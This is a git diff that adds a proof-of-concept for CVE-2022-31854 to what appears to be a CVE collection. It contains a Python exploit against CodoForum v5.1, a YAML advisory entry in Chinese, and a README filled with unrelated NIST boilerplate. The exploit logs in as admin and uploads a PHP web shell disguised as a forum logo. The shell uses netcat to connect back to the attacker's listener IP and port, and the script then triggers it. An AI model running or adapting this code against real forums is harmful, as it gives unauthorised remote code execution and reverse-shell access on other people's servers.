diff --git a/cve/codoforum/2022/CVE-2022-31854/README.md b/cve/codoforum/2022/CVE-2022-31854/README.md new file mode 100644 index 0000000000000000000000000000000000000000..4457882d905060a3ee50ae74e5e22ca49e68905e --- /dev/null +++ b/cve/codoforum/2022/CVE-2022-31854/README.md @@ -0,0 +1,6 @@ +# CVE-2022-31854 Proof-of-Concept + +### Overview + +References to Advisories, Solutions, and Tools +By selecting these links, you will be leaving NIST webspace. We have provided these links to other web sites because they may have information that would be of interest to you. No inferences should be drawn on account of other sites being referenced, or not, from this page. There may be other web sites that are more appropriate for your purpose. NIST does not necessarily endorse the views expressed, or concur with the facts presented on these sites. Further, NIST does not endorse any commercial products that may be mentioned on these sites. Please address comments about this page to nvd@nist.gov. \ No newline at end of file diff --git a/cve/codoforum/2022/CVE-2022-31854/exploit.py b/cve/codoforum/2022/CVE-2022-31854/exploit.py new file mode 100644 index 0000000000000000000000000000000000000000..d31cb3a22e2fe45d2023c8072d470e52b3b79965 --- /dev/null +++ b/cve/codoforum/2022/CVE-2022-31854/exploit.py @@ -0,0 +1,89 @@ +# Exploit Title: CodoForum v5.1 - File Upload Bypass to RCE (Authenticated) +# Date: 06/07/2022 +# Exploit Author: Krish Pandey (@vikaran101) +# Vendor Homepage: https://codoforum.com/ +# Software Link: https://bitbucket.org/evnix/codoforum_downloads/downloads/codoforum.v.5.1.zip +# Version: CodoForum v5.1 +# Tested on: Ubuntu 20.04 +# CVE: CVE-2022-31854 + +#!/usr/bin/python3 + +import requests +import time +import optparse +import random +import string + +banner = """ + ______ _______ ____ ___ ____ ____ _____ _ ___ ____ _ _ + / ___\ \ / / ____| |___ \ / _ \___ \|___ \ |___ // |( _ ) ___|| || | +| | \ \ / /| _| _____ __) | | | |__) | __) |____ |_ \| |/ _ \___ \| || |_ +| |___ \ V / | |__|_____/ __/| |_| / __/ / __/_____|__) | | (_) |__) |__ _| + \____| \_/ |_____| |_____|\___/_____|_____| |____/|_|\___/____/ |_| +""" + +print("\nCODOFORUM V5.1 ARBITRARY FILE UPLOAD TO RCE(Authenticated)") +print(banner) +print("\nExploit found and written by: @vikaran101\n") + +parser = optparse.OptionParser() +parser.add_option('-t', '--target-url', action="store", dest='target', help='path of the CodoForum v5.1 install') +parser.add_option('-u', '--username', action="store", dest='username', help='admin username') +parser.add_option('-p', '--password', action="store", dest='password', help='admin password') +parser.add_option('-i', '--listener-ip', action="store", dest='ip', help='listener address') +parser.add_option('-n', '--port', action="store", dest='port', help='listener port number') + +options, args = parser.parse_args() + +proxy = {'http': 'http://127.0.0.1:8080', 'https': 'https://127.0.0.1:8080'} + +if not options.target or not options.username or not options.password or not options.ip or not options.port: + print("[-] Missing arguments!") + print("[*] Example usage: ./exploit.py -t [target url] -u [username] -p [password] -i [listener ip] -n [listener port]") + print("[*] Help menu: ./exploit.py -h OR ./exploit.py --help") + exit() + +loginURL = options.target + '/admin/?page=login' +globalSettings = options.target + '/admin/index.php?page=config' +payloadURL = options.target + '/sites/default/assets/img/attachments/' + +session = requests.Session() + +randomFileName = ''.join((random.choice(string.ascii_lowercase) for x in range(10))) + +def getPHPSESSID(): + + try: + get_PHPID = session.get(loginURL) + headerDict = get_PHPID.headers + cookies = headerDict['Set-Cookie'].split(';')[0].split('=')[1] + return cookies + except: + exit() + +phpID = getPHPSESSID() + +def login(): + send_cookies = {'cf':'0'} + send_headers = {'Host': loginURL.split('/')[2], 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8','Accept-Language':'en-US,en;q=0.5','Accept-Encoding':'gzip, deflate','Content-Type':'multipart/form-data; boundary=---------------------------2838079316671520531167093219','Content-Length':'295','Origin':loginURL.split('/')[2],'Connection':'close','Referer':loginURL,'Upgrade-Insecure-Requests':'1'} + send_creds = "-----------------------------2838079316671520531167093219\nContent-Disposition: form-data; name=\"username\"\n\nadmin\n-----------------------------2838079316671520531167093219\nContent-Disposition: form-data; name=\"password\"\n\nadmin\n-----------------------------2838079316671520531167093219--" + auth = session.post(loginURL, headers=send_headers, cookies=send_cookies, data=send_creds, proxies=proxy) + + if "CODOFORUM | Dashboard" in auth.text: + print("[+] Login successful") + +def uploadAndExploit(): + send_cookies = {'cf':'0', 'user_id':'1', 'PHPSESSID':phpID} + send_headers = {'Content-Type':'multipart/form-data; boundary=---------------------------7450086019562444223451102689'} + send_payload = '\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="site_title"\n\nCODOLOGIC\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="site_description"\n\ncodoforum - Enhancing your forum experience with next generation technology!\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="admin_email"\n\nadmin@codologic.com\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="default_timezone"\n\nEurope/London\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="register_pass_min"\n\n8\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="num_posts_all_topics"\n\n30\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="num_posts_cat_topics"\n\n20\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="num_posts_per_topic"\n\n20\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_attachments_path"\n\nassets/img/attachments\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_attachments_exts"\n\njpg,jpeg,png,gif,pjpeg,bmp,txt\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_attachments_size"\n\n3\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_attachments_mimetypes"\n\nimage/*,text/plain\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_tags_num"\n\n5\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_tags_len"\n\n15\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="reply_min_chars"\n\n10\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="insert_oembed_videos"\n\nyes\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_privacy"\n\neveryone\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="approval_notify_mails"\n\n\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_header_menu"\n\nsite_title\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_logo"; filename="' + randomFileName + '.php"\nContent-Type: application/x-php\n\n&1|nc ' + options.ip + ' ' + options.port + ' >/tmp/f");?> \n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="login_by"\n\nUSERNAME\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="force_https"\n\nno\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="user_redirect_after_login"\n\ntopics\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="sidebar_hide_topic_messages"\n\noff\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="sidebar_infinite_scrolling"\n\non\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="show_sticky_topics_without_permission"\n\nno\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="CSRF_token"\n\n23cc3019cadb6891ebd896ae9bde3d95\n-----------------------------7450086019562444223451102689--\n' + exploit = requests.post(globalSettings, headers=send_headers, cookies=send_cookies, data=send_payload, proxies=proxy) + + print("[*] Checking webshell status and executing...") + payloadExec = session.get(payloadURL + randomFileName + '.php', proxies=proxy) + if payloadExec.status_code == 200: + print("[+] Payload uploaded successfully and executed, check listener") + else: + print("[-] Something went wrong, please try uploading the shell manually(admin panel > global settings > change forum logo > upload and access from " + payloadURL +"[file.php])") +login() +uploadAndExploit() diff --git a/cve/codoforum/2022/CVE-2022-31854/requirements.txt b/cve/codoforum/2022/CVE-2022-31854/requirements.txt new file mode 100644 index 0000000000000000000000000000000000000000..f2e8afac28ebfb683afe9d90214bc4e26c4b5132 --- /dev/null +++ b/cve/codoforum/2022/CVE-2022-31854/requirements.txt @@ -0,0 +1,2 @@ +requests +optparse diff --git a/cve/codoforum/2022/yaml/CVE-2022-31854.yaml b/cve/codoforum/2022/yaml/CVE-2022-31854.yaml new file mode 100644 index 0000000000000000000000000000000000000000..7e1a642355d8c19708004bf1f1da0021c564f50d --- /dev/null +++ b/cve/codoforum/2022/yaml/CVE-2022-31854.yaml @@ -0,0 +1,22 @@ +id: CVE-2022-31854 +source: https://github.com/Vikaran101/CVE-2022-31854 +info: + name: Codoforum – 一个免费增值的跨平台论坛应用程序,需要基于 PHP 的 Web 服务器才能工作。 + severity: high + description: | + 通过管理面板中的徽标更改选项发现Codoforum v5.1包含任意文件上传漏洞。 + scope-of-influence: + Codoforum = 5.1 + reference: + - https://codoforum.com + - https://vikaran101.medium.com/codoforum-v5-1-authenticated-rce-my-first-cve-f49e19b8bc + - https://github.com/Vikaran101/CVE-2022-31854/blob/main/exploit.py + - http://packetstormsecurity.com/files/167782/CodoForum-5.1-Remote-Code-Execution.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + cve-id: CVE-2022-31854 + cwe-id: CWE-434 + cnvd-id: None + kve-id: None + tags: RCE, cve2022, 危险类型文件的不加限制上传 \ No newline at end of file diff --git a/openkylin_list.yaml b/openkylin_list.yaml index 5d5c89dd537898f0aad7d83cb346d87d988788d3..df48a30d35c9bc7c0d38ed70f068ca7e91cf05ae 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -87,6 +87,8 @@ cve: - CVE-2022-2992 - CVE-2022-2185 - CVE-2022-2884 + codoforum: + - CVE-2022-31854 confluence: - CVE-2019-3394 - CVE-2019-3396